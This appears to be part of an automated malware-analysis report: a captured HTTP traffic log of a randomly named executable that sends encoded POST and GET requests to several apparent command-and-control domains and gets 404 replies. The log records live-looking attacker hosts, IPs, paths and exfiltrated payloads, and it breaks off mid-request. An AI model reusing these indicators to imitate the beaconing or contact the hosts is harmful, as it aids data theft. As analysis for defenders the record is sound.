                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.tekilla.wtf
                                                        Origin: http://www.tekilla.wtf
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAahk/d17Yw8yxln8cjR/WM2N448QnikY4LsPw370=
                                                        Sep 18, 2024 16:18:35.831392050 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 18 Sep 2024 14:18:35 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Ascii: 404 page not found


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        6 | 192.168.2.5 | 53620 | 172.191.244.62 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:37.999349117 CEST | 833 | OUT | POST /fpzw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.tekilla.wtf
                                                        Origin: http://www.tekilla.wtf
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWhAovYQzU5RRPfApsjs7aGzcwv9sLeZi3dheSYb
                                                        Sep 18, 2024 16:18:38.680747032 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 18 Sep 2024 14:18:38 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Ascii: 404 page not found


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        7 | 192.168.2.5 | 53621 | 172.191.244.62 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:40.541198969 CEST | 1850 | OUT | POST /fpzw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.tekilla.wtf
                                                        Origin: http://www.tekilla.wtf
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhcqk83kygivycA5klv8ClBxSS+zhts+N8+CtSH7rgqec3BtEUyJv4JDAP4sV2oS7GhaYhw4aDSOSoDODW46s1I0mRMS53cji3cgbF4WC6igKXLYvPeO0VYXt60S+Wg+gHhCO+w41AE+/0JdkmuzHng1Witzcr9rQ/zYVBNHBaOWphyr1CjjrfhMdNdOZtvLdPnxiIOCWifVdAS+9avR69PrpiP3og+/C3eOixHriMiJa3B6Xn4/jLYIFxfqWkXXNxzSEUuCZVK4gKO50tdQBBKTIvXpWMNuj2XpfyLS8oWtStL7U+6D42sFXOvYoGJs+RxDk5hdT6fl4JrkZP9+3ckwAvLp5v02TsNbNCuwEP9UzU9wGUSxXF44zBf88+RpYtxe80RxmdNVVhp1jXz01vTf7YyUd+5kbmnGQT4YzQGrXbDUxItWatlxiFH54jgb5AVVNlrj6ZzOM2lEbbHdf5Q/mCxjkgyIJEnOD4o2W/yc08HEaJp4piYXUes2Gj9rskQTlSBSQ8GtrO7JzhEzsr7Rnsb1JhPnFT5uGU9aB8qQ0uImgKrpy2T1U6PspqTtfUltmEn5rqfwrRYfKYtfrVeyVxCyn0M9vs8NRAwZVwD/TxVC94VM/KJoSbbtH0FCsTCCGxBrK4Hqm/xVXGQBxQPzyN4S2IPs7PojUPTjle8WhcnJxKm5i+fU+58/eb/Q6jPyBwaFwEvHMS93KYV5uPAq/ib/IZmUzqxFx0M2gMOzf9CppCmWWLczTkOwljAp9ZHd7qynwgzB+/pVHV/+UvNftIe07CFGXLY9ozCdGyFV8PdimV4C5f5ByrFq69qDgj89 [TRUNCATED]
                                                        Sep 18, 2024 16:18:41.007587910 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 18 Sep 2024 14:18:40 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Ascii: 404 page not found


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        8 | 192.168.2.5 | 53622 | 172.191.244.62 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:43.088589907 CEST | 560 | OUT | GET /fpzw/?2VDlJ=Z2VdhTx&x0wHoJ8X=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV8YvjGskVquY7O4GS1YJERNPT4cclYTval7UCV/4UAiTeAA== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.tekilla.wtf
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:18:43.557492971 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 18 Sep 2024 14:18:43 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        9 | 192.168.2.5 | 53623 | 172.96.191.39 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:48.856637955 CEST | 822 | OUT | POST /3qit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.bola88site.one
                                                        Origin: http://www.bola88site.one
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.bola88site.one/3qit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 72 31 69 64 6b 78 54 37 76 4e 67 36 55 69 58 51 79 74 6d 74 52 54 77 59 35 46 37 78 71 2b 56 65 42 6b 53 68 66 63 3d
                                                        Data Ascii: x0wHoJ8X=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUr1idkxT7vNg6UiXQytmtRTwY5F7xq+VeBkShfc=
                                                        Sep 18, 2024 16:18:49.783720970 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Wed, 18 Sep 2024 14:18:49 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        10 | 192.168.2.5 | 53624 | 172.96.191.39 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:51.405745983 CEST | 842 | OUT | POST /3qit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.bola88site.one
                                                        Origin: http://www.bola88site.one
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.bola88site.one/3qit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 2f 49 49 71 4e 4d 67 61 66 38 45 69 30 69 2f 49 4a 47 31 56 74 6f 76 69 31 4d 36 51 62 4f 34 65 33 51 66 6a 4d 7a
                                                        Data Ascii: x0wHoJ8X=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+x/IIqNMgaf8Ei0i/IJG1Vtovi1M6QbO4e3QfjMz
                                                        Sep 18, 2024 16:18:52.296257973 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Wed, 18 Sep 2024 14:18:52 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        11 | 192.168.2.5 | 53625 | 172.96.191.39 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:54.002728939 CEST | 1859 | OUT | POST /3qit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.bola88site.one
                                                        Origin: http://www.bola88site.one
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.bola88site.one/3qit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 42 39 78 6c 4b 4c 50 67 52 44 6a 68 54 43 4e 34 46 5a 31 4f 58 5a 4c 51 77 31 77 4c 70 68 78 6e 42 37 6d 47 52 31 79 42 61 58 6b 61 62 4c 64 57 52 4a 6b 50 52 36 77 7a 58 52 77 6f 48 4d 52 41 65 65 30 4b 4b 65 58 76 61 39 7a 53 43 30 63 44 38 56 65 79 6a 6e 35 4d 70 4c 50 62 61 52 74 34 63 5a 39 34 6d 2b 56 6a 53 74 4c 46 7a 6c 6e 50 75 61 6e 6e 52 59 62 2f 67 36 39 4a 57 2f 4c 5a 49 6a 65 6b 4d 43 63 51 75 5a 41 48 39 6a 76 58 69 33 30 58 4a 2b 64 59 4d 69 6d 4c 38 69 58 [TRUNCATED]
                                                        Sep 18, 2024 16:18:54.881388903 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Wed, 18 Sep 2024 14:18:54 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        12 | 192.168.2.5 | 53626 | 172.96.191.39 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:56.536655903 CEST | 563 | OUT | GET /3qit/?x0wHoJ8X=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYdT0P+5RUfPK3QBy2V8RIR3qX5RHElk5NoP1SAVBTInHq3g==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.bola88site.one
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:18:57.440395117 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Wed, 18 Sep 2024 14:18:57 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        13 | 192.168.2.5 | 53627 | 217.70.184.50 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:19:02.632920980 CEST | 831 | OUT | POST /nxfn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.languagemodel.pro
                                                        Origin: http://www.languagemodel.pro
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
